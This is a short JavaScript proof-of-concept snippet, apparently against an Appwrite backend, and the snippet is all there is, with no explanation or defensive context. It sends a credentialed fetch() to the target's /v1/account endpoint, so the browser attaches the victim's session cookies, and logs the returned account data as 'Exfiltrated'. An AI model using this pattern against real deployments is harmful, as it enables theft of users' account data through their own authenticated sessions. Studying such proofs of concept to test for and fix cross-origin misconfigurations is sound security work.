fetch("https://target-appwrite-endpoint/v1/account", { credentials: "include" }) .then(res => res.json()) .then(data => { console.log("Exfiltrated:", data); });